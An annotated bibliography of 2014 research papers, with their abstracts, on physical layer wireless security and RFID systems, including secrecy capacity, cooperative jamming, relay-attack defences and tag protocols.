  • Alfaro-Ponce, M.; Arguelles Cruz, A.; Chairez, I., "Adaptive Identifier for Uncertain Complex Nonlinear Systems Based on Continuous Neural Networks," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.3, pp.483,494, March 2014. (ID#:14-1720) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6585821&isnumber=6740874 This paper presents the design of a complex-valued differential neural network identifier for uncertain nonlinear systems defined in the complex domain. This design includes the construction of an adaptive algorithm to adjust the parameters included in the identifier. The algorithm is obtained based on a special class of controlled Lyapunov functions. The quality of the identification process is characterized using the practical stability framework. Indeed, the region where the identification error converges is derived by the same Lyapunov method. This zone is defined by the power of uncertainties and perturbations affecting the complex-valued uncertain dynamics. Moreover, this convergence zone is reduced to its lowest possible value using ideas related to the so-called ellipsoid methodology. Two simple but informative numerical examples are developed to show how the identifier proposed in this paper can be used to approximate uncertain nonlinear systems valued in the complex domain. Keywords: Lyapunov methods; identification; neural nets; nonlinear systems; uncertain systems; Lyapunov method; adaptive algorithm; adaptive identifier; approximate uncertain nonlinear systems; complex domain; complex valued differential neural network identifier; complex-valued uncertain dynamics; continuous neural networks; controlled Lyapunov functions; convergence zone; ellipsoid methodology; identification error; identification process; practical stability framework; uncertain complex nonlinear systems; Artificial neural networks; Biological neural networks; Least squares approximations; Lyapunov methods; Nonlinear systems; Training; Complex-valued neural networks; continuous neural network; controlled Lyapunov function; nonparametric identifier

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Physical Layer Security

Physical Layer Security


Physical layer security presents the theoretical foundation for new model for secure communications by exploiting the noise inherent to communications channels. Based on information-theoretic limits of secure communications at the physical layer, the concept has challenges and opportunities related to designing of physical layer security schemes. The works presented here address the information-theoretical underpinnings of physical layer security and present various approaches and outcomes for communications systems.

  • Rajeev Singh, Teek Parval Sharma, "A Key Hiding Communication Scheme for Enhancing the Wireless LAN Security," Wireless Personal Communications: An International Journal, Volume 77 Issue 2, July 2014, (Pages 1145-1165). (ID#:14-1721) Available at: http://dx.doi.org/10.1007/s11277-013-1559-0 Authentication per frame and symmetric key based encryption is an implicit necessity for security in Wireless Local Area Networks (LANs). We propose a novel symmetric key based secure WLAN communication scheme. The scheme provides authentication per frame, generates new secret key for encryption of each frame and involves less message exchanges for maintaining the freshness of key and initial vector (IV). It enhances wireless security by utilizing key hiding concept for sharing the symmetric secret key and IV. The shared secret encryption key and IV are protected using counters and then mixed with each other before sending. We prove security of the scheme in Canetti-Krawczyk model. Keywords: Authentication, SK-secure protocol, Symmetric key encryption, Wireless security, physical layer security
  • Mukherjee, A.; Fakoorian, S.; Huang, J.; Swindlehurst, A., "Principles of Physical Layer Security in Multiuser Wireless Networks: A Survey," Communications Surveys & Tutorials, IEEE, vol. PP, no.99, pp.1, 24, February 2014. (ID#:14-1722) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739367&isnumber=5451756 This paper provides a comprehensive review of the domain of physical layer security in multiuser wireless networks. The essential premise of physical layer security is to enable the exchange of confidential messages over a wireless medium in the presence of unauthorized eavesdroppers, without relying on higher-layer encryption. This can be achieved primarily in two ways: without the need for a secret key by intelligently designing transmit coding strategies, or by exploiting the wireless communication medium to develop secret keys over public channels. The survey begins with an overview of the foundations dating back to the pioneering work of Shannon and Wyner on information-theoretic security. We then describe the evolution of secure transmission strategies from point-to-point channels to multiple-antenna systems, followed by generalizations to multiuser broadcast, multiple-access, interference, and relay networks. Secret-key generation and establishment protocols based on physical layer mechanisms are subsequently covered. Approaches for secrecy based on channel coding design are then examined, along with a description of inter-disciplinary approaches based on game theory and stochastic geometry. The associated problem of physical layer message authentication is also briefly introduced. The survey concludes with observations on potential research directions in this area. Keywords: Information-theoretic security; Physical layer security; artificial noise; cooperative jamming; secrecy; secret-key agreement; wiretap channel
  • Saad, Walid; Zhou, Xiangyun; Han, Zhu; Poor, H.Vincent, "On the Physical Layer Security of Backscatter Wireless Systems," Wireless Communications, IEEE Transactions on , vol.13, no.6, pp.3442,3451, June 2014. (ID#:14-1723) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6836141&isnumber=6836134 Backscatter wireless communication lies at the heart of many practical low-cost, low-power, distributed passive sensing systems. The inherent cost restrictions coupled with the modest computational and storage capabilities of passive sensors, such as RFID tags, render the adoption of classical security techniques challenging; which motivates the introduction of physical layer security approaches. Despite their promising potential, little has been done to study the prospective benefits of such physical layer techniques in backscatter systems. In this paper, the physical layer security of wireless backscatter systems is studied and analyzed. First, the secrecy rate of a basic single-reader, single-tag model is studied. Then, the unique features of the backscatter channel are exploited to maximize this secrecy rate. In particular, the proposed approach allows a backscatter system's reader to inject a noise-like signal, added to the conventional continuous wave signal, in order to interfere with an eavesdropper's reception of the tag's information signal. The benefits of this approach are studied for a variety of scenarios while assessing the impact of key factors, such as antenna gains and location of the eavesdropper, on the overall secrecy of the backscatter transmission. Numerical results corroborate our analytical insights and show that, if properly deployed, the injection of artificial noise yields significant performance gains in terms of improving the secrecy of backscatter wireless transmission. Keywords: Backscatter; Communication system security; Noise; Physical layer; Security; Wireless communication; Wireless sensor networks; Secrecy rate; artificial noise; backscatter communication; physical layer security
  • Lifeng Wang; Nan Yang; Elkashlan, M.; Phee Lep Yeoh; Jinhong Yuan, "Physical Layer Security of Maximal Ratio Combining in Two-Wave With Diffuse Power Fading Channels," Information Forensics and Security, IEEE Transactions on , vol.9, no.2, pp.247,258, Feb. 2014. (ID#:14-1724) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6698305&isnumber=6705647 This paper advocates physical layer security of maximal ratio combining (MRC) in wiretap two-wave with diffuse power fading channels. In such a wiretap channel, we consider that confidential messages transmitted from a single antenna transmitter to an M-antenna receiver are overheard by an N-antenna eavesdropper. The receiver adopts MRC to maximize the probability of secure transmission, whereas the eavesdropper adopts MRC to maximize the probability of successful eavesdropping. We derive the secrecy performance for two practical scenarios: 1) the eavesdropper's channel state information (CSI) is available at the transmitter and 2) the eavesdropper's CSI is not available at the transmitter. For the first scenario, we develop a new analytical framework to characterize the average secrecy capacity as the principal security performance metric. Specifically, we derive new closed-form expressions for the exact and asymptotic average secrecy capacity. Based on these, we determine the high signal-to-noise ratio power offset to explicitly quantify the impacts of the main channel and the eavesdropper's channel on the average secrecy capacity. For the second scenario, the secrecy outage probability is the primary security performance metric. Here, we derive new closed-form expressions for the exact and asymptotic secrecy outage probability. We also derive the probability of nonzero secrecy capacity. The asymptotic secrecy outage probability explicitly indicates that the positive impact of M is reflected in the secrecy diversity order and the negative impact of N is reflected in the secrecy array gain. Motivated by this, we examine the performance gap between N and N+1 antennas based on their respective secrecy array gains. Keywords: diversity reception; fading channels; telecommunication security; antenna transmitter; asymptotic average secrecy capacity; asymptotic secrecy outage probability; closed form expression; diffuse power fading channel; eavesdropper channel state information; exact secrecy outage probability; maximal ratio combining; nonzero secrecy; physical layer security; wiretap channel; wiretap two wave communication; Antennas; Fading; Physical layer; Receivers; Security; Signal to noise ratio; Transmitters ;Physical layer security; average secrecy capacity; maximal ratio combining; secrecy outage probability; two-wave with diffuse power fading
  • Vaidyanathaswami, Rajaraman; Thangaraj, Andrew, "Robustness of Physical Layer Security Primitives Against Attacks on Pseudorandom Generators," Communications, IEEE Transactions on , vol.62, no.3, pp.1070,1079, March 2014. (ID#:14-1725) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6730892&isnumber=6777265 Physical layer security protocols exploit inviolable physical laws at the signal level for providing guarantees on secrecy of communications. These protocols invariably involve randomized encoding at the transmitter, for which an ideal random number generator is typically assumed in the literature. In this work, we study the impact of using weak Pseudo Random Number Generators (PRNGs) in physical layer security protocols for coding and forward key distribution over Binary Symmetric and Gaussian wiretap channels. In the case of wiretap channel coding, we study fast correlation attacks that aim to retrieve the initial seed used in the PRNGs. Our results show that randomized coset encoding, which forms an important part of wiretap channel coding, provides useful robustness against fast correlation attacks. In the case of single-round or forward key distribution over a Gaussian wiretap channel, the bits from a PRNG are nonlinearly transformed to generate Gaussian-distributed pseudo random numbers at the transmitter. In such cases, we design modified versions of the fast correlation attacks accounting for the effects of the nonlinear transformation and soft input. We observe that, even for moderately high memory, the success probability of the modified fast correlation attacks become the same as that of a random guess in many cases. Keywords: correlation; Encoding; Generators; Physical layer; Protocols; Security; Vectors; Fast correlation; key distribution protocols; physical layer security; wiretap channel
  • Gupta, V.K.; Jindal, P., "Cooperative Jamming and Aloha Protocol for Physical Layer Security," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.64,68, 8-9 Feb. 2014. (ID#:14-1726) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783427&isnumber=6783406 or http://dl.acm.org/citation.cfm?id=2605698.2605832&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 Cooperative jamming, a potential supplement can be used to improve physical layer based security by transmitting a weighted jamming signal to create interference at the eavesdropper. The secrecy rate is derived for cooperative jamming technique in terms of network throughput. We have analyzed the effect of Aloha protocol with cooperative jamming on the secrecy capacity of large scale network. To implement cooperative jamming with Aloha protocol a transmitter can be considered as a source or as a friendly jammer with the massage transmission probability p. We observed that an optimum level of security can be achieved for a specific value of jammer power using cooperative jamming and at the moderate value of massage transmission probability p using cooperative jamming with Aloha protocol. Keywords: access protocols; channel capacity; cooperative communication; cryptographic protocols; interference suppression; jamming; radio transmitters; telecommunication security; Aloha protocol; cooperative jamming technique; eavesdropper; interference suppression; massage transmission probability; network throughput; physical layer security; secrecy capacity; secrecy rate; transmitter; weighted jamming signal transmission; Jamming; Physical layer; Protocols; Security; Throughput; Wireless networks; Aloha; friendly jammer; path loss exponent; physical layer security; secrecy capacity
  • Yifei Zhuang; Lampe, Lutz, "Physical layer security in MIMO power line communication networks," Power Line Communications and its Applications (ISPLC), 2014 18th IEEE International Symposium on , vol., no., pp.272,277, March 30 2014-April 2, 2014. (ID#:14-1727) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6812346&isnumber=6812309 or http://dl.acm.org/citation.cfm?id=2580129.2580645&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 It has well been established that multiple-input multiple-output (MIMO) transmission using multiple conductors can improve the data rate of power line communication (PLC) systems. In this paper, we investigate whether the presence of multiple conductors could also facilitate the communication of confidential messages by means of physical layer security methods. In particular, this paper focuses on the secrecy capacity of MIMO PLC. Numerical experiments show that multi-conductor PLC networks can enable a more secure communication compared to the single conductor case. On the other hand, we demonstrate that the keyhole property of PLC channels generally diminishes the secure communication capability compared to what would be achieved in a similar wireless communications setting. Keywords: Conductors; Impedance; MIMO; OFDM; Receivers; Signal to noise ratio; Wireless communication; MIMO; Power line communication; physical layer security
  • Bo Liu; Lijia Zhang; Xiangjun Xin; Yongjun Wang, "Physical Layer Security in OFDM-PON Based on Dimension-Transformed Chaotic Permutation," Photonics Technology Letters, IEEE , vol.26, no.2, pp.127,130, Jan.15, 2014. (ID#:14-1728) Available at:http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657686&isnumber=6693740 A physical layer security enhanced orthogonal frequency division multiplexing (OFDM) passive optical network based on dimension-transformed chaotic permutation is proposed and experimentally demonstrated. In this scheme, a large key space is obtained by multidomain jointed Rossler permutation, and the corresponding complexity scale caused by multidomain encryption can be reduced through dimension-transformed permutation. An experiment with 10.61-Gb/s encrypted optical OFDM access system is performed to demonstrate the proposed method. Keywords: OFDM modulation; cryptography; optical chaos; optical computing; optical fiber networks; passive optical networks; telecommunication security; OFDM-PON; bit rate 10.61 Gbit/s; corresponding complexity scale; dimension-transformed chaotic permutation; encrypted optical OFDM access system; large key space; multidomain encryption; multidomain jointed Rossler permutation; orthogonal frequency division multiplexing passive optical network; physical layer security; Encryption; OFDM; Optical network units; Passive optical networks; Space vehicles; Transforms; Orthogonal frequency division multiplexing; Rossler mapping; dimension-transform; passive optical network
  • Geraci, G.; Dhillon, H.S.; Andrews, J.G.; Yuan, J.; Collings, I.B., "Physical Layer Security in Downlink Multi-Antenna Cellular Networks," Communications, IEEE Transactions on , vol.62, no.6, pp.2006,2021, June 2014. (ID#:14-1729) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6782290&isnumber=6839072 In this paper, we study physical layer security for the downlink of cellular networks, where the confidential messages transmitted to each mobile user can be eavesdropped by both; 1) the other users in the same cell and 2) the users in the other cells. The locations of base stations and mobile users are modeled as two independent two-dimensional Poisson point processes. Using the proposed model, we analyze the secrecy rates achievable by regularized channel inversion (RCI) precoding by performing a large-system analysis that combines tools from stochastic geometry and random matrix theory. We obtain approximations for the probability of secrecy outage and the mean secrecy rate, and characterize regimes where RCI precoding achieves a non-zero secrecy rate. We find that unlike isolated cells, if one treats interference as noise, the secrecy rate in a cellular network does not grow monotonically with the transmit power, and the network tends to be in secrecy outage if the transmit power grows unbounded. Furthermore, we show that there is an optimal value for the base station deployment density that maximizes the secrecy rate, and this value is a decreasing function of the transmit power. Keywords: Downlink ;Interference; Physical layer; Security; Signal to noise ratio; Stochastic processes; Physical layer security; cellular networks; linear precoding; random matrix theory (RMT); stochastic geometry
  • Romero-Zurita, N.; McLernon, D.; Ghogho, M., "Physical Layer Security By Robust Masked Beamforming And Protected Zone Optimization," Communications, IET , vol.8, no.8, pp.1248,1257, May 22, 2014. (ID#:14-1730) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6827061&isnumber=6827053 The authors address the physical layer security in multiple-input-single-output communication systems. This study introduces a robust strategy to cope with the channel state information errors in the main link to convey confidential information towards a legitimate receiver while artificial noise is broadcast to confuse an unknown eavesdropper. The authors study how an eavesdropper physically located in the vicinity of the transmitter can put at risk the network's security, and hence, as a countermeasure, a 'protected zone' was deployed to prevent the close-quarters eavesdropping attacks. The authors determine the size of the protected zone and transmission covariance matrices of the steering information and the artificial noise to maximize the worst-case secrecy rate in a resource-constrained system and to minimize the use of resources to ensure an average secrecy rate. The proposed robust masked beamforming scheme offers a secure performance even with erroneous estimates of the main channel showing that a protected zone not only enhances the transmission security but it allows us to make an efficient use of energy by prioritizing the available resources. Keywords: (not provided)
  • Saeed Ur Rehman, Kevin W. Sowerby, Colin Coghill, "Analysis of Impersonation Attacks On Systems Using RF Fingerprinting And Low-End Receivers," Journal of Computer and System Sciences, Volume 80 Issue 3, May, 2014, (Pages 591-601). (ID#:14-1731) Available at: http://dl.acm.org/citation.cfm?id=2567015.2567377&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1016/j.jcss.2013.06.013 Recently, physical layer security commonly known as Radio Frequency (RF) fingerprinting has been proposed to provide an additional layer of security for wireless devices. A unique RF fingerprint can be used to establish the identity of a specific wireless device in order to prevent masquerading/impersonation attacks. In the literature, the performance of RF fingerprinting techniques is typically assessed using high-end (expensive) receiver hardware. However, in most practical situations receivers will not be high-end and will suffer from device specific impairments which affect the RF fingerprinting process. This paper evaluates the accuracy of RF fingerprinting employing low-end receivers. The vulnerability to an impersonation attack is assessed for a modulation-based RF fingerprinting system employing low-end commodity hardware (by legitimate and malicious users alike). Our results suggest that receiver impairment effectively decreases the success rate of impersonation attack on RF fingerprinting. In addition, the success rate of impersonation attack is receiver dependent. Keywords: Hardware security, Impersonation attack, Physical layer security, Radio fingerprinting
  • Peng Xu, Xiaodong Xu, "A Cooperative Transmission Scheme for the Secure Wireless Multicasting," Wireless Personal Communications: An International Journal, Volume 77 Issue 2, July 2014, (Pages 1239-1248). (ID#:14-1732) Available at: http://dl.acm.org/citation.cfm?id=2633692.2633744&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1007/s11277-013-1563-4 In this paper, a wireless multicast scenario with secrecy constraints is considered, where the source wishes to send a common message to two intended destinations in the presence of a passive eavesdropper. One destination is equipped with multiple antennas, and all of the other three nodes are equipped with a single antenna. Different to the conventional direct transmission, we propose a cooperative transmission scheme based on the cooperation between the two destinations. The basic idea is to divide the multicast scenario into two cooperative unicast transmissions at two phases and the two destinations help each other to jam the eavesdropper in turns. Such a cooperative transmission does not require the knowledge of the eavesdropper's channel state information. Both analytic and numerical results demonstrate that the proposed cooperative scheme can achieve zero-approaching outage probability. Keywords: Cooperative transmission, Multicast, Outage probability, Secrecy rate

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Radio Frequency Identification

Radio Frequency Identification



Radio frequency identification (RFID) has become a ubiquitous identification system used to provide positive identification for items as diverse as cheese and pets. Research into RFID technologies continues and the security of RFID tags is being increasingly questioned. The papers presented here start with countermeasures and proceed to area coverage, mobility, reliability, antennas, and tag localization.

  • Guizani, Sghaier, "Security Applications Challenges Of RFID Technology And Possible Countermeasures," Computing, Management and Telecommunications (ComManTel), 2014 International Conference on , vol., no., pp.291,297, 27-29 April 2014. (ID#:14-1757) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825620&isnumber=6825559 Radio Frequency IDentification (RFID) is a technique for speedy and proficient identification system, it has been around for more than 50 years and was initially developed for improving warfare machinery. RFID technology bridges two technologies in the area of Information and Communication Technologies (ICT), namely Product Code (PC) technology and Wireless technology. This broad-based rapidly expanding technology impacts business, environment and society. The operating principle of an RFID system is as follows. The reader starts a communication process by radiating an electromagnetic wave. This wave will be intercepted by the antenna of the RFID tag, placed on the item to be identified. An induced current will be created at the tag and will activate the integrated circuit, enabling it to send back a wave to the reader. The reader redirects information to the host where it will be processed. RFID is used for wide range of applications in almost every field (Health, education, industry, security, management ...). In this review paper, we will focus on agricultural and environmental applications. Keywords: Antennas; Communication channels; ISO standards; Integrated circuits; Radiofrequency identification; Security; Intelligent systems; Management; Product Code; RFID
  • Pascal Urien, Selwyn Piramuthu, "Elliptic Curve-Based RFID/NFC Authentication With Temperature Sensor Input For Relay Attacks," Decision Support Systems, Volume 59, March, 2014, (Pages 28-36). (ID#:14-1758) Available at: http://dl.acm.org/citation.cfm?id=2592306.2592498&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1016/j.dss.2013.10.003 Unless specifically designed for its prevention, none of the existing RFID authentication protocols are immune to relay attacks. Relay attacks generally involve the presence of one or more adversaries who transfer unmodified messages between a prover and a verifier. Given that the message content is not modified, it is rather difficult to address relay attacks through cryptographic means. Extant attempts to prevent relay attacks involve measuring signal strength, round-trip distance, and ambient conditions in the vicinity of prover and verifier. While a majority of related authentication protocols are based on measuring the round-trip distance between prover and verifier using several single-bit challenge-response pairs, recent discussions include physical proximity verification using ambient conditions to address relay attacks. We provide an overview of existing literature on addressing relay attacks through ambient condition measurements. We then propose an elliptic curve-based mutual authentication protocol that addresses relay attacks based on (a) the surface temperature of the prover as measured by prover and verifier and (b) measured single-bit round-trip times between prover and verifier. We also evaluate the security properties of the proposed authentication protocol. Keywords: Distance bounding protocol, Mutual authentication, RFID, Relay attack
  • Sangyup Lee; Choong-Yong Lee; Wonse Jo; Dong-Han Kim, "An Efficient Area Coverage Algorithm Using Passive RFID System," Sensors Applications Symposium (SAS), 2014 IEEE , vol., no., pp.366,371, 18-20 Feb. 2014. (ID#:14-1759) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798977&isnumber=6798900 This paper proposes an efficient area coverage algorithm for multi-agent robotic systems in the smart floor environment consists of passive RFID system. The passive RFID system used in this research allows to store and read information on an RFID tag, which should be located within the detection range of RF antenna. The location information is explicitly stored in the RFID tag, where the smart floor environment is constructed by laying RFID tags on the floor. Mobile robot equipped with an antenna receives the location information in the RFID tag. Based on this information, the position of mobile robot can be estimated and at the same time, the efficiency of area scanning process can be improved compared to other methods because it provides a scanning trace for other mobile robots. This paper proposes an efficient area coverage algorithm for multi-agent mobile robotic systems using the smart floor environment. Keywords: microwave antennas; mobile robots; multi-agent systems; path planning; radiofrequency identification; radio navigation; RF antenna detection range; RFID tag; area scanning process; efficient area coverage algorithm; location information; multiagent mobile robotic system; passive RFID system; scanning trace; smart floor environment; Algorithm design and analysis; Floors; Mobile robots; Passive RFID tags; Radio frequency; Robot kinematics; Passive RFID system; RFID; area coverage; localization; smart floor
  • Zhu, W.; Cao, J.; Chan, H.C.B.; Liu, X.; Raychoudhury, V., "Mobile RFID with a High Identification Rate," Computers, IEEE Transactions on , vol.63, no.7, pp.1778,1792, July 2014. (ID#:14-1760) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6470601&isnumber=6840867 An important category of mobile RFID systems is the RFID system with mobile RFID tags. The mobility of RFID tags poses new challenges to designing RFID anti-collision protocols. Existing RFID anti-collision protocols cannot support high tag moving speed and high identification rate simultaneously. These protocols do not distinguish the identification deadlines of moving tags. Also, when tags move fast, they cannot determine the number of unidentified tags in the interrogation area of an RFID reader. In this paper, we propose a schedule-based RFID anti-collision protocol which, given a high identification rate, achieves the maximal tag moving speed. The protocol, without the need to estimate the number of unidentified tags, schedules an optimal number of tags to compete for the channel according to their identification deadlines, so as to achieve the optimal identification performance. The simulation and experiment results show that our approach can increase the moving speed of tags significantly compared with existing approaches, while achieving a high identification rate. Keywords: Belts; Equations; Mobile communication; Protocols; RFID tags; Throughput; Mobile RFID; anti-collision protocol; high identification rate
  • Sabesan, S.; Crisp, M.J.; Penty, R.V.; White, I.H., "Wide Area Passive UHF RFID System Using Antenna Diversity Combined With Phase and Frequency Hopping," Antennas and Propagation, IEEE Transactions on , vol.62, no.2, pp.878,888, Feb. 2014. (ID#:14-1761) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657729&isnumber=6729042 This paper presents a long range and effectively error-free ultra high frequency (UHF) radio frequency identification (RFID) interrogation system. The system is based on a novel technique whereby two or more spatially separated transmit and receive antennas are used to enable greatly enhanced tag detection performance over longer distances using antenna diversity combined with frequency and phase hopping. The novel technique is first theoretically modelled using a Rician fading channel. It is shown that conventional RFID systems suffer from multi-path fading resulting in nulls in radio environments. We, for the first time, demonstrate that the nulls can be moved around by varying the phase and frequency of the interrogation signals in a multi-antenna system. As a result, much enhanced coverage can be achieved. A prototype RFID system is built based on an Impinj R2000 transceiver. The demonstrator system shows that the new approach improves the tag detection accuracy from to 100% over a 20 m x15 m area, compared with a conventional switched multi-antenna RFID system. Keywords: Rician channels; UHF antennas; antenna arrays; diversity reception; radio transceivers; radiofrequency identification; receiving antennas; transmitting antennas; Impinj R2000 transceiver; Rician fading channel; UHF RFID interrogation system; antenna diversity; error-free ultra high frequency radio frequency identification; frequency hopping; interrogation signals; multiantenna system; multipath fading; phase hopping; prototype RFID system; radio environments; receive antennas; switched multiantenna RFID system; tag detection accuracy; transmit antennas; wide area passive UHF RFID system; Fading; Passive RFID tags; Radio frequency; Rician channels; Transmitting antennas; Detection accuracy; distributed antenna system (DAS);frequency hopping; nulls; passive radio frequency identification (RFID);phase hopping; read range; returned signal strength indicator (RSSI)
  • Goller, Michael; Feichtenhofer, Christoph; Pinz, Axel, "Fusing RFID and Computer Vision For Probabilistic Tag Localization," RFID (IEEE RFID), 2014 IEEE International Conference on , vol., no., pp.89,96, 8-10 April 2014. (ID#:14-1762) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810717&isnumber=6810700 The combination of RFID and computer vision systems is an effective approach to mitigate the limited tag localization capabilities of current RFID deployments. In this paper, we present a hybrid RFID and computer vision system for localization and tracking of RFID tags. The proposed system combines the information from the two complementary sensor modalities in a probabilistic manner and provides a high degree of flexibility. In addition, we introduce a robust data association method which is crucial for the application in practical scenarios. To demonstrate the performance of the proposed system, we conduct a series of experiments in an article surveillance setup. This is a frequent application for RFID systems in retail where previous approaches solely based on RFID localization have difficulties due to false alarms triggered by stationary tags. Our evaluation shows that the fusion of RFID and computer vision provides robustness to false positive observations and allows for a reliable system operation. Keywords: Antenna measurements; Antenna radiation patterns; Cameras; Radiofrequency identification; Robustness; Trajectory
  • Morgado, T.A.; Alves, J.M.; Marcos, J.S.; Maslovski, S.I.; Costa, J.R.; Fernandes, C.A.; Silveirinha, M.G., "Spatially Confined UHF RFID Detection With a Metamaterial Grid," Antennas and Propagation, IEEE Transactions on , vol.62, no.1, pp.378,384, Jan. 2014. (ID#:14-1763) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645379&isnumber=6701163 The confinement of the detection region is one of the most challenging issues in Ultra-High Frequency (UHF) Radio Frequency Identification (RFID) systems. Here, we propose a new paradigm to confine the interrogation zone of standard UHF RFID systems. Our approach relies on the use of an all-planar metamaterial wire grid to block the radiation field (i.e., the far-field) of the reader antenna, and thereby obtain a spatially well-confined detection region in the near-field. This solution is analytically and numerically investigated, and then experimentally verified through near-field and tag-reading measurements, demonstrating its effectiveness and robustness under external perturbations. Keywords: UHF antennas; antenna radiation patterns; metamaterial antennas; radiofrequency identification; all-planar metamaterial wire grid; detection region confinement; interrogation zone; metamaterial grid; near-field measurement; radiation field; reader antenna ;spatially well-confined detection region; spatially-confined UHF RFID detection; standard UHF RFID systems;tag-reading measurement; ultrahigh-frequency radiofrequency identification systems; Dipole antennas; Metamaterials; Probes; RFID tags; Wires; Metamaterials; near-field UHF RFID; radio frequency identification (RFID); wire media
  • Cook, B.S.; Vyas, R.; Kim, S.; Thai, T.; Le, T.; Traille, A.; Aubert, H.; Tentzeris, M.M., "RFID-Based Sensors for Zero-Power Autonomous Wireless Sensor Networks," Sensors Journal, IEEE , vol.14, no.8, pp.2419,2431, Aug. 2014. (ID#:14-1764) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6701187&isnumber=6841675 Radio frequency identification (RFID) technology has enabled a new class of low cost, wireless zero-power sensors, which open up applications in highly pervasive and distributed RFID-enabled sensing, which were previously not feasible with wired or battery powered wireless sensor nodes. This paper provides a review of RFID sensing techniques utilizing chip-based and chipless RFID principles, and presents a variety of implementations of RFID-based sensors, which can be used to detect strain, temperature, water quality, touch, and gas. Keywords: Antennas; Backscatter; Radiofrequency identification; Temperature sensors; Topology; Wireless sensor networks; RFID; Wireless sensors; inkjet printing; mm-wave
  • Vahedi, E.; Ward, R.K.; Blake, I.F., "Performance Analysis of RFID Protocols: CDMA Versus the Standard EPC Gen-2," Automation Science and Engineering, IEEE Transactions on, vol. PP, no.99, pp.1,12, January 2014. (ID#:14-1765) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6716098&isnumber=4358066 Radio frequency identification (RFID) is a ubiquitous wireless technology which allows objects to be identified automatically. An RFID tag is a small electronic device with an antenna and has a unique identification (ID) number. RFID tags can be categorized into passive and active tags. For passive tags, a standard communication protocol known as EPC-global Generation-2, or briefly EPC Gen-2, is currently in use. RFID systems are prone to transmission collisions due to the shared nature of the wireless channel used by tags. The EPC Gen-2 standard recommends using dynamic framed slotted ALOHA technique to solve the collision issue and to read the tag IDs successfully. Recently, some researchers have suggested to replace the dynamic framed slotted ALOHA technique used in the standard EPC Gen-2 protocol with the code division multiple access (CDMA) technique to reduce the number of collisions and to improve the tag identification procedure. In this paper, the standard EPC Gen-2 protocol and the CDMA-based tag identification schemes are modeled as absorbing Markov chain systems. Using the proposed Markov chain systems, the analytical formulae for the average number of queries and the total number of transmitted bits needed to identify all tags in an RFID system are derived for both the EPC Gen-2 protocol and the CDMA-based tag identification schemes. In the next step, the performance of the EPC Gen-2 protocol is compared with the CDMA-based tag identification schemes and it is shown that the standard EPC Gen-2 protocol outperforms the CDMA-based tag identification schemes in terms of the number of transmitted bits and the average time required to identify all tags in the system. Keywords: Code division multiple access (CDMA); EPC Gen-2; Markov model; framed ALOHA; radio frequency identification (RFID); tag singulation
  • Chen, L.; Demirkol, I.; Heinzelman, W., "Token-MAC: A Fair MAC Protocol for Passive RFID Systems," Mobile Computing, IEEE Transactions on , vol.13, no.6, pp.1352,1365, June 2014. (ID#:14-1766) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6629988&isnumber=6824285 Passive RFID systems used for inventory management and asset tracking typically utilize contention-based MAC protocols, such as the standard C1G2 protocol. Although the C1G2 protocol has the advantage that it is easy to implement, it suffers from unfairness and relatively low throughput when the number of tags in the network increases. This paper proposes a token-based MAC protocol called Token-MAC for passive RFID systems, which aims a) to provide a fair chance for tags in the network to access the medium without requiring synchronization of the tags, b) to increase the overall throughput, i.e., the tag rate, and c) to enable a high number of tags to be read under limited tag read time availability, which is an especially important challenge for mobile applications. We implement Token-MAC as well as C1G2 and a TDMA-based protocol using Intel WISP passive RFID tags and perform experiments. Additionally, based on our experimental results, we develop energy harvesting and communication models for tags that we then use in simulations of the three protocols. Our experimental and simulation results all show that Token-MAC can achieve a higher tag rate and better fairness than C1G2, and it can provide better performance over a longer range compared with the TDMA-based protocol. It is also shown that Token-MAC achieves much lower tag detection delay, especially for high numbers of tags. Token-MAC is, therefore, a promising solution for passive RFID systems. Keywords: Media Access Protocol; Mobile computing; Passive RFID tags; Thigh; Time division multiple access;C1G2 protocol; Data communications; General; MAC protocol; Passive RFID
